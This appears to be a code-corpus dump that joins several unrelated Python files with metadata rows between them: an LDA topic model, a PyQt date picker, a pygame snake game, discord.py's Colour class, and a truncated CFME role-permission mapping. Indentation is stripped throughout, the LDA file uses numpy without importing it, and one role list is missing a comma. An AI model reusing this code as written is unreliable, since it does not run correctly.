import operator
import time
import os
import pickle
from multiprocessing import Pool
import threading
def parallel_inference(i, st, ed, o_docs, o_z_m_n, o_n_m_z, o_n_z_t, o_n_z):
# print "i =", i, "st =", st, "ed =", ed, "docs =", o_docs
# print "BEFORE:"
# print "\tz_m_n =", o_z_m_n
# print "\tn_m_z =", o_n_m_z
# print "\tn_z_t =", o_n_z_t
# print "\tn_z =", o_n_z
for m, doc in enumerate(o_docs):
z_n = o_z_m_n[m]
n_m_z = o_n_m_z[m]
for n, t in enumerate(doc):
# discount for n-th word t with topic z
z = z_n[n]
n_m_z[z] -= 1
o_n_z_t[z, t] -= 1
o_n_z[z] -= 1
# sampling topic new_z for t
p_z = o_n_z_t[:, t] * n_m_z / o_n_z
new_z = numpy.random.multinomial(1, p_z / p_z.sum()).argmax()
# set z the new topic and increment counters
z_n[n] = new_z
n_m_z[new_z] += 1
o_n_z_t[new_z, t] += 1
o_n_z[new_z] += 1
# print "AFTER:"
# print "\tz_m_n =", o_z_m_n
# print "\tn_m_z =", o_n_m_z
# print "\tn_z_t =", o_n_z_t
# print "\tn_z =", o_n_z
return (i, st, ed, o_z_m_n, o_n_m_z, o_n_z_t, o_n_z)
class LDA:
def __init__(self, K, alpha, beta, cont, docs, docs_nt, V, docs_times, output_dir, prev_lda, \
nproc, smartinit=True):
self.K = K
self.alpha = alpha # parameter of topics prior
self.beta = beta # parameter of words prior
self.cont = cont # contribution proportion of history topics
self.docs = docs
self.docs_nt = docs_nt
self.docs_times = docs_times
self.V = V
self.output_dir = output_dir
self.nproc = nproc
self.tlock = threading.Lock()
self.z_m_n = [] # topics of words of documents
self.n_m_z = numpy.zeros((len(self.docs), K)) + alpha
self.n_z_t = numpy.zeros((K, V)) + beta # word count of each topic and vocabulary
self.n_z_t_new = numpy.zeros((K, V)) # new word count of each topic and vocabulary
self.n_z = numpy.zeros(K) + V * beta # word count of each topic
if prev_lda != None:
#convert the old model's topic-word matrix counts to proportion
sum_n_z_t = 0
for z_t in prev_lda.n_z_t:
sum_n_z_t += sum(z_t)
for (z, z_t) in enumerate(prev_lda.n_z_t):
for (t, val) in enumerate(z_t):
self.n_z_t[z, t] = ((float(prev_lda.n_z_t[z,t]) / \
sum_n_z_t)*self.V*self.K*self.beta*(self.cont)) \
+ (self.beta*(1.0-self.cont))
for (z, val) in enumerate(self.n_z):
self.n_z[z] = sum(self.n_z_t[z])
for (row_id, row) in enumerate(prev_lda.n_m_z):
for (col_id, col) in enumerate(row):
self.n_m_z[row_id][col_id] = col
self.N = 0
for m, doc in enumerate(docs):
self.N += len(doc)
z_n = []
for t in doc:
if smartinit:
p_z = self.n_z_t[:, t] * self.n_m_z[m] / self.n_z
z = numpy.random.multinomial(1, p_z / p_z.sum()).argmax()
else:
z = numpy.random.randint(0, K)
z_n.append(z)
self.n_m_z[m, z] += 1
self.n_z_t[z, t] += 1
self.n_z[z] += 1
self.z_m_n.append(numpy.array(z_n))
#update the document timestamp
prev_time = docs_times[m]
def parallel_inference_complete(self, result):
(i, st, ed, z_m_n, n_m_z, n_z_t, n_z) = result
self.tlock.acquire()
#update z_m_n and n_m_z
self.z_m_n[st:ed] = z_m_n
self.n_m_z[st:ed] = n_m_z
#update n_z_t (reduce-scatter operation)
self.n_z_t_new = self.n_z_t_new + (n_z_t - self.n_z_t)
self.tlock.release()
def inference(self):
# print "ORIGINAL:"
# print "\tdocs =", self.docs
# print "\tz_m_n =", self.z_m_n
# print "\tn_m_z =", self.n_m_z
# print "\tn_z_t =", self.n_z_t
# print "\tn_z =", self.n_z
#refesh the n_z_t array used for storing new counts
self.n_z_t_new = numpy.zeros((self.K, self.V))
#Spawn a number of threads to do the inference
po = Pool()
num_doc_per_proc = float(len(self.docs))/self.nproc
for i in range(0, self.nproc):
st = int(round(float(i)*num_doc_per_proc))
ed = int(round(float(i+1)*num_doc_per_proc))
po.apply_async(parallel_inference, \
(i, st, ed, self.docs[st:ed], self.z_m_n[st:ed], self.n_m_z[st:ed], \
self.n_z_t, self.n_z), callback=self.parallel_inference_complete)
po.close()
po.join()
#update n_z_t
self.n_z_t = self.n_z_t + self.n_z_t_new
#update n_z
self.n_z = numpy.sum(self.n_z_t, 1)
# print "MERGED:"
# print "\tz_m_n =", self.z_m_n
# print "\tn_m_z =", self.n_m_z
# print "\tn_z_t =", self.n_z_t
# print "\tn_z =", self.n_z
def worddist(self):
"""get topic-word distribution"""
return self.n_z_t / self.n_z[:, numpy.newaxis]
def perplexity(self, docs=None):
if docs == None: docs = self.docs
phi = self.worddist()
log_per = 0
N = 0
Kalpha = self.K * self.alpha
for m, doc in enumerate(docs):
theta = self.n_m_z[m] / (len(self.docs[m]) + Kalpha)
for w in doc:
log_per -= numpy.log(numpy.inner(phi[:,w], theta))
N += len(doc)
return numpy.exp(log_per / N)
def drop_one_day_data(voca, lda, alpha):
n_firstday = lda.docs_nt[0]
#decrement the counts of topic-word matrix for the documents to be removed
for (m, doc) in enumerate(lda.docs[:n_firstday]):
for (n, t) in enumerate(doc):
z = lda.z_m_n[m][n]
lda.n_z_t[z, t] -= 1
lda.n_z[z] -= 1
voca.wordfreq[t] -= 1
lda.docs = lda.docs[n_firstday:]
lda.docs_nt = lda.docs_nt[1:]
lda.docs_times = lda.docs_times[n_firstday:]
lda.z_m_n = lda.z_m_n[n_firstday:]
lda.n_m_z = lda.n_m_z[n_firstday:]
#convert the n_m_z counts to priors
total_n_m_z = 0.0
for n_m in lda.n_m_z:
total_n_m_z += sum(n_m)
for (m, n_m) in enumerate(lda.n_m_z):
for (z, count) in enumerate(n_m):
new_prior = (float(count)/(total_n_m_z))*len(lda.n_m_z)*lda.K*alpha
lda.n_m_z[m][z] = new_prior
return (voca, lda)
def lda_learning(lda, iteration, voca):
pre_perp = lda.perplexity()
print "initial perplexity=%f" % pre_perp
for i in range(iteration):
start = time.time()
lda.inference()
print "(%.1fs) iter=%d" % (time.time()-start, i + 1),
if ( (i+1)%50 == 0):
perp = lda.perplexity()
print "p=%f" % (perp)
else:
print
output_word_topic_dist(lda, voca)
def output_word_topic_dist(lda, voca):
phi = lda.worddist()
topics_file = open(lda.output_dir + "/topics.txt", "w")
for k in range(lda.K):
#print "\n-- topic: %d" % k
for w in numpy.argsort(-phi[k])[:10]:
#print "%s: %f" % (voca[w], phi[k,w])
topics_file.write(voca[w] + " ")
topics_file.write("\n")
def main():
import optparse
import vocabulary
parser = optparse.OptionParser()
parser.add_option("-f", dest="filename", type="string", help="corpus filename")
parser.add_option("-t", dest="time_file", help="timestamp of documents")
parser.add_option("-o", dest="output_dir", type="string", help="output directory")
parser.add_option("-m", dest="model", help="previously trained model")
parser.add_option("--alpha", dest="alpha", type="float", help="parameter alpha", default=0.001)
parser.add_option("--beta", dest="beta", type="float", help="parameter beta", default=0.01)
parser.add_option("-p", dest="cont", type="float", help="parameter contribution proportion", \
default=0.5)
parser.add_option("-k", dest="K", type="int", help="number of topics", default=50)
parser.add_option("-i", dest="iteration", type="int", help="iteration count", default=500)
parser.add_option("-s", dest="smartinit", action="store_false", \
help="smart initialize of parameters", default=True)
parser.add_option("--stopwords", dest="stopwords", help="exclude stop words", \
action="store_true", default=True)
parser.add_option("--seed", dest="seed", type="int", help="random seed")
parser.add_option("--wf", dest="wf", type="int", \
help="threshold of word frequency to cut words", default=1)
parser.add_option("--num-proc", dest="nproc", type="int", help="number of processors", \
default=4)
(options, args) = parser.parse_args()
if not (options.filename) or \
not (options.time_file) or not(options.output_dir):
parser.error("need (corpus filename(-f) and "
"document timestamp file(-t) and output directory(-o)")
if options.filename:
corpus = vocabulary.load_file(options.filename)
if options.seed != None:
numpy.random.seed(options.seed)
if not os.path.exists(options.output_dir):
os.makedirs(options.output_dir)
voca = vocabulary.Vocabulary(options.stopwords, options.wf)
if options.model:
(prev_voca, prev_lda) = pickle.load(open(options.model))
#drop one day worth's of data to accommodate the new day's data
prev_voca, prev_lda = drop_one_day_data(prev_voca, prev_lda, options.alpha)
options.K = prev_lda.K
else:
prev_lda = None
prev_voca = None
#generate the vocabularies for voca
voca.gen_vocabs(corpus, prev_voca, prev_lda)
docs = [voca.doc_to_ids(doc) for doc in corpus]
#calculate the number of elements for each timestamp group in docs
docs_nt = []
docs_times = [ item.strip() for item in open(options.time_file).readlines() ]
tmp_nt = {}
for time in set(docs_times):
tmp_nt[time] = docs_times.count(time)
for (time, count) in sorted(tmp_nt.items()):
docs_nt.append(count)
tmp_nt.clear()
if options.model:
#update docs
tmp_docs = []
tmp_docs.extend(prev_lda.docs)
tmp_docs.extend(docs)
docs = tmp_docs
#update docs_times
tmp_docs_times = []
tmp_docs_times.extend(prev_lda.docs_times)
tmp_docs_times.extend(docs_times)
docs_times = tmp_docs_times
#update docs_nt
tmp_docs_nt = []
tmp_docs_nt.extend(prev_lda.docs_nt)
tmp_docs_nt.extend(docs_nt)
docs_nt = tmp_docs_nt
#if options.wf > 0: docs = voca.cut_low_freq(docs, options.wf)
#initialise lda
lda = LDA(options.K, options.alpha, options.beta, options.cont, docs, docs_nt, voca.size(), \
docs_times, options.output_dir, prev_lda, options.nproc, options.smartinit)
#print word frequency
freqword = {}
freqword_file = open(lda.output_dir + "/freqwords.txt", "w")
for (vocab_id, freq) in enumerate(voca.wordfreq):
freqword[voca.vocas[vocab_id]] = freq
for (vocab, freq) in sorted(freqword.items(), key=operator.itemgetter(1), reverse=True):
freqword_file.write(vocab + " " + str(freq) + "\n")
freqword_file.flush()
print "corpus=%d, words=%d, K=%d, a=%f, b=%f, nproc=%d" % (len(corpus), len(voca.vocas),
options.K, options.alpha, options.beta, options.nproc)
#import cProfile
#cProfile.runctx('lda_learning(lda, options.iteration, voca)', globals(), locals(), 'lda.profile')
lda_learning(lda, options.iteration, voca)
#save the model for potential re-use later
lda.tlock = None
pickle.dump((voca, lda), open(options.output_dir + "/model.dat", "w"))
if __name__ == "__main__":
main()
| apache-2.0 | -2,468,384,668,615,679,500 | 35.545455 | 102 | 0.55264 | false | 2.940538 | false | false | false |
NathanW2/qmap | src/qmap/datatimerpickerwidget.py | 1 | 4232 | from PyQt4.QtGui import QDialog,QApplication, QButtonGroup
from PyQt4.QtCore import QTime, Qt, QDateTime
from ui_datatimerpicker import Ui_datatimerpicker
from qgis.core import *
from utils import log
class DateTimePickerDialog(QDialog):
"""
A custom date picker with a time and date picker
"""
def __init__(self, mode="DateTime"):
QDialog.__init__(self)
# Set up the user interface from Designer.
self.ui = Ui_datatimerpicker()
self.ui.setupUi(self)
self.mode = mode
self.group = QButtonGroup()
self.group.setExclusive(True)
self.group.addButton(self.ui.ambutton)
self.group.addButton(self.ui.pmbutton)
self.ui.ambutton.toggled.connect(self.isDirty)
self.ui.pmbutton.toggled.connect(self.isDirty)
self.ui.datepicker.selectionChanged.connect(self.isDirty)
self.ui.hourpicker.itemSelectionChanged.connect(self.isDirty)
self.ui.minutepicker.itemSelectionChanged.connect(self.isDirty)
self.ui.buttonBox.accepted.connect(self.accept)
self.ui.buttonBox.rejected.connect(self.reject)
self.ui.setasnowbutton.pressed.connect(self.setAsNow)
self.setWindowFlags(Qt.Dialog | Qt.CustomizeWindowHint)
if mode == "Date":
self.ui.timesection.hide()
self.ui.setasnowbutton.setText("Set as current date")
elif mode == "Time":
self.ui.datepicker.hide()
self.ui.setasnowbutton.setText("Set as current time")
def isDirty(self, *args):
date = self.getSelectedDate()
time = self.getSelectedTime()
datetime = QDateTime(date, time)
if self.mode == "Date":
value = datetime.toString("ddd d MMM yyyy")
elif self.mode == "Time":
value = datetime.toString("h:m ap")
else:
value = datetime.toString("ddd d MMM yyyy 'at' h:m ap")
self.ui.label.setText(value)
def setDateTime(self, datetime):
"""
Set the picker to datatime
datetime - The QDateTime with the value to set.
"""
self.setTime(datetime.time())
self.setDate(datetime.date())
def setAsNow(self):
"""
Set the current date and time on the picker as now.
"""
now = QDateTime.currentDateTime()
self.setDateTime(now)
def setTime(self, time):
"""
Set just the time part of the picker
"""
hour = time.hour()
if hour > 12:
hour = hour - 12
if hour == 0:
hour = hour + 12
minute = time.minute()
minute = int(round(minute / 5.0) * 5.0)
amap = time.toString("AP")
log("Hour %s Minute %s" % (hour, minute))
try:
houritems = self.ui.hourpicker.findItems(str(hour), Qt.MatchFixedString)
self.ui.hourpicker.setCurrentItem(houritems[0])
except IndexError:
log("Can't find hour")
try:
minuteitems = self.ui.minutepicker.findItems(str(minute), Qt.MatchFixedString)
self.ui.minutepicker.setCurrentItem(minuteitems[0])
except IndexError:
log("Can't find minute")
if amap == "PM":
self.ui.pmbutton.toggle()
def setDate(self, date):
"""
Set just the date part of the picker
"""
self.ui.datepicker.setSelectedDate(date)
def getSelectedTime(self):
"""
Returns the currently selected data and time
"""
try:
hour = self.ui.hourpicker.currentItem().text()
except AttributeError:
hour = ""
try:
minute = self.ui.minutepicker.currentItem().text()
except AttributeError:
minute = ""
zone = self.ui.ambutton.isChecked() and "AM" or "PM"
return QTime.fromString("%s%s%s" % (hour, minute, zone), "hmAP")
def getSelectedDate(self):
"""
Returns just the date part of the picker
"""
return self.ui.datepicker.selectedDate()
if __name__ == "__main__":
app = QApplication([])
dlg = DateTimePickerDialog()
dlg.show()
app.exec_() | gpl-2.0 | 8,286,299,197,854,796,000 | 30.589552 | 90 | 0.587902 | false | 3.850773 | false | false | false |
alej0varas/gibbles | gibbles/__main__.py | 1 | 7759 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# nibbles like game. much more fun, moves on all directions and jump, can be played with mouse.
from math import cos, radians, sin
from random import choice
import os
import sys
import pygame
from pygame.locals import *
from pygame.colordict import THECOLORS
import data
EGG_RATIO = 5
MAX_EGGS = 2
SNAKE_WIDTH = 4
SNAKE_INITIAL_LENGTH = 10
SNAKE_INITIAL_HEADING = 90
SNAKE_INITIAL_SPEED = 10
SNAKE_INITIAL_POSITION = (200,200)
SNAKE_COLOR = THECOLORS['green']
INITIAL_GAME_SPEED = 5
WIDTH = 400
HEIGHT = 400
RESOLUTION = (WIDTH, HEIGHT)
class SnakeBodyPart(pygame.sprite.Sprite):
"""Snake body part."""
def __init__(self, image, position, in_body_position):
pygame.sprite.Sprite.__init__(self)
self.image = image
self.rect = self.image.get_rect()
self.rect.topleft = position
self.in_body_position = in_body_position
class Snake:
"""Player"""
spacing = 5
head_img = pygame.image.load(data.load(os.path.join('images', 'head.png')))
tail_img = pygame.image.load(data.load(os.path.join('images', 'tail.png')))
body_img = pygame.image.load(data.load(os.path.join('images', 'body.png')))
def __init__(self, start, sections, heading, speed, color):
self.body = [start]
self.body.extend(
[
(
start[0] + sin(radians(360 - heading)) * self.spacing * i,
start[1] + cos(radians(360 - heading)) * self.spacing * i
) for i in range(sections)
]
)
self.sections = sections
self.heading = heading
self.speed = speed
self.color = color
self.older = False
self.alive = True
self.rects = []
self.in_air = 0
self.bodyparts = pygame.sprite.OrderedUpdates()
self.create_bodyparts()
@property
def head(self):
return self.bodyparts.sprites()[0].rect
@property
def head_point(self):
"""Return the closest to heading point of head's rect"""
if 45 < self.heading < 135:
return self.head.midright
elif 135 < self.heading < 225:
return self.head.midbottom
elif 225 < self.heading < 315:
return self.head.midleft
else:
return self.head.midtop
def advance(self):
head = self.body[0]
if self.older:
self.older -= 1
tail = self.body[:]
else:
tail = self.body[:-1]
xinc = sin(radians(self.heading)) * self.spacing
yinc = cos(radians(self.heading)) * self.spacing
head = (head[0] + xinc, head[1] + yinc)
# check if run into snakes own body and die
# why the split?, don't consider the beginning of the body, this make the snake die when turning
for part in self.bodyparts.sprites()[10:]:
if not self.in_air:
if part.rect.colliderect(self.head):
self.die()
# fell down from jump
if self.in_air:
self.in_air -= 1
body = []
body.append(head)
body.extend(tail)
self.body = body
self.create_bodyparts()
# put sprites in place
for i in range(len(tail)):
self.bodyparts.sprites()[i].rect.topleft = self.body[i]
def create_bodyparts(self):
self.bodyparts.empty()
# first head
self.bodyparts.add(SnakeBodyPart(self.head_img, self.body[0], 0))
# then body
# minus head and tail
for i in range(1, len(self.body) - 2):
self.bodyparts.add(SnakeBodyPart(self.body_img, self.body[i], i))
# finally tail
self.bodyparts.add(SnakeBodyPart(self.tail_img, self.body[-1], len(self.body)))
def die(self):
self.alive = False
def grow_up(self, sections=1):
self.older += sections
def jump(self):
if not self.in_air:
self.in_air += 10
class Egg(pygame.sprite.Sprite):
"""Eggs the player collect"""
def __init__(self, position, image):
pygame.sprite.Sprite.__init__(self)
self.image = image
self.rect = self.image.get_rect()
self.rect.topleft = position
self.position = position
self.eaten = False
self.drawed = False
def die(self):
self.drawed = False # Get redrawed
self.eaten = True
class Main:
def __init__(self):
self.window = pygame.display.set_mode(RESOLUTION)
self.background = pygame.Surface(RESOLUTION)
self.background.fill(THECOLORS['white'])
self.screen = pygame.display.get_surface()
self.screen.fill(THECOLORS['white'])
self.s = Snake(SNAKE_INITIAL_POSITION, SNAKE_INITIAL_LENGTH , SNAKE_INITIAL_HEADING, SNAKE_INITIAL_SPEED, SNAKE_COLOR)
self.s.bodyparts.clear(self.screen, self.background)
self.s.bodyparts.draw(self.screen)
self.pos = (0,0)
self.eggs = pygame.sprite.Group()
self.clock = pygame.time.Clock()
self.game_speed = INITIAL_GAME_SPEED
# TODO: Loader for eggs images
self.egg_image = pygame.image.load('data/images/egg%s.png' % choice([0]))
self.egg_size = self.egg_image.get_width(), self.egg_image.get_height()
self.dead_egg = pygame.Surface(self.egg_size)
self.dead_egg.fill(THECOLORS['white'])
def run(self):
while self.s.alive:
# add eggs
while len(self.eggs) < MAX_EGGS:
invalid = True
# Get egg position
while invalid:
position = choice(range(self.egg_size[0], WIDTH - self.egg_size[0])), choice(range(self.egg_size[1], HEIGHT - self.egg_size[1]))
rect = pygame.Rect(position, self.egg_size)
# check against eggs
invalid = any([egg.rect.colliderect(rect) for egg in self.eggs])
# check against snake
if not invalid:
invalid = any([bp.rect.colliderect(rect) for bp in self.s.bodyparts.sprites()])
self.eggs.add(Egg(position, self.egg_image))
# eat eggs.
for egg in self.eggs.sprites():
if egg.rect.colliderect(self.s.head):
egg.die()
self.s.grow_up(5)
self.game_speed += 1
if not egg.drawed:
self.screen.blit(egg.image, egg.rect)
egg.drawed = True
if egg.eaten:
self.screen.blit(self.dead_egg, egg.rect)
self.eggs.remove(egg)
self.input(pygame.event.get())
self.s.bodyparts.clear(self.screen, self.background)
self.s.bodyparts.draw(self.screen)
pygame.display.flip()
self.s.advance()
# fall out of screen
if not self.screen.get_rect().collidepoint(self.s.head_point):
self.s.die()
self.clock.tick(self.game_speed)
def input(self, events):
for event in events:
if event.type == QUIT:
sys.exit(0)
elif event.type == MOUSEMOTION:
if event.pos[0] < self.pos[0]:
self.s.heading += 1
else:
self.s.heading -= 1
self.pos = event.pos
elif event.type in (KEYUP, KEYDOWN):
if event.key == K_SPACE:
self.s.jump()
elif event.key == K_ESCAPE:
sys.exit(0)
def main():
pygame.init()
game = Main()
game.run()
| gpl-3.0 | 6,522,315,543,549,074,000 | 30.669388 | 148 | 0.553551 | false | 3.694762 | false | false | false |
potatosushi/Discord-Notification-Bot | discord/colour.py | 2 | 6599 | # -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-2016 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
class Colour:
"""Represents a Discord role colour. This class is similar
to an (red, green, blue) tuple.
There is an alias for this called Color.
Supported operations:
+-----------+----------------------------------------+
| Operation | Description |
+===========+========================================+
| x == y | Checks if two colours are equal. |
+-----------+----------------------------------------+
| x != y | Checks if two colours are not equal. |
+-----------+----------------------------------------+
| hash(x) | Return the colour's hash. |
+-----------+----------------------------------------+
| str(x) | Returns the hex format for the colour. |
+-----------+----------------------------------------+
Attributes
------------
value : int
The raw integer colour value.
"""
__slots__ = [ 'value' ]
def __init__(self, value):
self.value = value
def _get_byte(self, byte):
return (self.value >> (8 * byte)) & 0xff
def __eq__(self, other):
return isinstance(other, Colour) and self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return '#{:0>6x}'.format(self.value)
def __hash__(self):
return hash(self.value)
@property
def r(self):
"""Returns the red component of the colour."""
return self._get_byte(2)
@property
def g(self):
"""Returns the green component of the colour."""
return self._get_byte(1)
@property
def b(self):
"""Returns the blue component of the colour."""
return self._get_byte(0)
def to_tuple(self):
"""Returns an (r, g, b) tuple representing the colour."""
return (self.r, self.g, self.b)
@classmethod
def default(cls):
"""A factory method that returns a :class:`Colour` with a value of 0."""
return cls(0)
@classmethod
def teal(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x1abc9c``."""
return cls(0x1abc9c)
@classmethod
def dark_teal(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x11806a``."""
return cls(0x11806a)
@classmethod
def green(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x2ecc71``."""
return cls(0x2ecc71)
@classmethod
def dark_green(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x1f8b4c``."""
return cls(0x1f8b4c)
@classmethod
def blue(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x3498db``."""
return cls(0x3498db)
@classmethod
def dark_blue(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x206694``."""
return cls(0x206694)
@classmethod
def purple(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x9b59b6``."""
return cls(0x9b59b6)
@classmethod
def dark_purple(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x71368a``."""
return cls(0x71368a)
@classmethod
def magenta(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xe91e63``."""
return cls(0xe91e63)
@classmethod
def dark_magenta(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xad1457``."""
return cls(0xad1457)
@classmethod
def gold(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xf1c40f``."""
return cls(0xf1c40f)
@classmethod
def dark_gold(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xc27c0e``."""
return cls(0xc27c0e)
@classmethod
def orange(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xe67e22``."""
return cls(0xe67e22)
@classmethod
def dark_orange(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xa84300``."""
return cls(0xa84300)
@classmethod
def red(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0xe74c3c``."""
return cls(0xe74c3c)
@classmethod
def dark_red(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x992d22``."""
return cls(0x992d22)
@classmethod
def lighter_grey(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x95a5a6``."""
return cls(0x95a5a6)
@classmethod
def dark_grey(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x607d8b``."""
return cls(0x607d8b)
@classmethod
def light_grey(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x979c9f``."""
return cls(0x979c9f)
@classmethod
def darker_grey(cls):
"""A factory method that returns a :class:`Colour` with a value of ``0x546e7a``."""
return cls(0x546e7a)
Color = Colour
| mit | -4,478,125,788,136,537,600 | 31.328283 | 91 | 0.571147 | false | 3.942055 | false | false | false |
lkhomenk/integration_tests | cfme/roles.py | 2 | 22851 | from cfme.utils.log import logger
def _remove_page(roles, group, pages):
if group in roles:
for page in pages:
if page in roles[group]:
roles[group].remove(page)
else:
logger.info("Page %s attempted to be removed from role %s, "
"but isn't in there anyway", page, group)
else:
logger.info("Attempted to remove a page from role %s, but role "
"doesn't exist", group)
def _remove_from_all(roles, r_page):
for group in roles:
for page in roles[group]:
if page == r_page:
roles[group].remove(page)
else:
logger.info("Page %s attempted to be removed from role %s, "
"but isn't in there anyway", page, group)
group_data = {
'evmgroup-administrator': [
'control_explorer',
'control_simulation',
'control_import_export',
'control_log',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'infrastructure_pxe',
'infrastructure_requests',
'clouds_providers',
'clouds_availability_zones',
'clouds_flavors',
'clouds_security_groups',
'clouds_instances',
'clouds_stacks',
'my_settings',
'tasks',
'about',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'automate_explorer',
'automate_simulation',
'automate_customization',
'automate_import_export',
'automate_log',
'automate_requests',
'my_services',
'services_catalogs',
'services_requests',
'services_workloads',
'utilization',
'planning',
'bottlenecks'
],
'evmgroup-approver': [
'control_explorer',
'control_simulation',
'control_log',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'infrastructure_pxe',
'infrastructure_requests',
'clouds_instances',
'my_settings',
'tasks',
'about',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
        'services_requests',
'services_workloads'
],
'evmgroup-auditor': [
'control_explorer',
'control_simulation',
'control_log',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'infrastructure_pxe',
'clouds_instances',
'my_settings',
'tasks',
'about',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'services_workloads',
'utilization',
'planning',
'bottlenecks'
],
'evmgroup-desktop': [
'services_requests',
'services_workloads',
'dashboard',
'infrastructure_config_management',
'infrastructure_requests',
'infrastructure_virtual_machines',
'clouds_instances',
'my_settings',
'about'
],
'evmgroup-operator': [
'services_workloads',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'infrastructure_pxe',
'clouds_instances',
'my_settings',
'tasks',
'about'
],
'evmgroup-security': [
'control_explorer',
'control_simulation',
'control_log',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'clouds_instances',
'my_settings',
'tasks',
'about',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'services_workloads'
],
'evmgroup-super_administrator': [
'control_explorer',
'control_simulation',
'control_import_export',
'control_log',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'infrastructure_pxe',
'infrastructure_requests',
'infrastructure_config_management',
'clouds_providers',
'clouds_availability_zones',
'clouds_flavors',
'clouds_security_groups',
'clouds_instances',
'clouds_tenants',
'clouds_stacks',
'my_settings',
'tasks',
'configuration',
'about',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'automate_explorer',
'automate_simulation',
'automate_customization',
'automate_import_export',
'automate_log',
'automate_requests',
'my_services',
'services_catalogs',
'services_requests',
'services_workloads',
'utilization',
'planning',
'bottlenecks'
],
'evmgroup-support': [
'control_explorer',
'control_simulation',
'control_log',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'clouds_instances',
'my_settings',
'tasks',
'about',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'services_workloads'
],
'evmgroup-user': [
'services_workloads',
'services_requests',
'dashboard',
'reports',
'chargeback',
'timelines',
'rss',
'infrastructure_providers',
'infrastructure_clusters',
'infrastructure_hosts',
'infrastructure_virtual_machines',
'infrastructure_resource_pools',
'infrastructure_datastores',
'infrastructure_requests',
'clouds_instances',
'my_settings',
'tasks',
'about'
],
'evmgroup-user_limited_self_service': [
'clouds_instances',
'services_requests',
'infrastructure_virtual_machines',
'infrastructure_requests',
'my_settings',
'about'
],
'evmgroup-user_self_service': [
'clouds_instances',
'services_requests',
'infrastructure_config_management',
'infrastructure_virtual_machines',
'infrastructure_requests',
'my_settings',
'about'
],
'evmgroup-vm_user': [
'clouds_instances',
'infrastructure_config_management',
'infrastructure_virtual_machines',
'infrastructure_requests',
'services_requests',
'services_workloads',
'my_settings',
'about'
]
}
# Matches structure/string format of VerticalNavigation output for tree, not UI access control tree
# TODO include non-vertical nav RBAC to settings, help
# TODO RBAC goes deeper than vertical nav, into accordions. example cloud intel -> Reports
role_access_ui_59z = {
'evmgroup-super_administrator': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Jobs', 'Explorer'],
'Automate': ['Log', 'Generic Objects', 'Simulation', 'Import / Export', 'Customization',
'Requests', 'Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Flavors', 'Instances', 'Providers', 'Host Aggregates', 'Availability Zones',
'Key Pairs', 'Tenants', 'Stacks', 'Topology'],
'Containers': ['Container Nodes', 'Containers', 'Providers', 'Overview',
'Container Templates', 'Image Registries', 'Container Builds',
'Container Services', 'Volumes', 'Container Images', 'Routes', 'Pods',
'Replicators', 'Projects', 'Topology'],
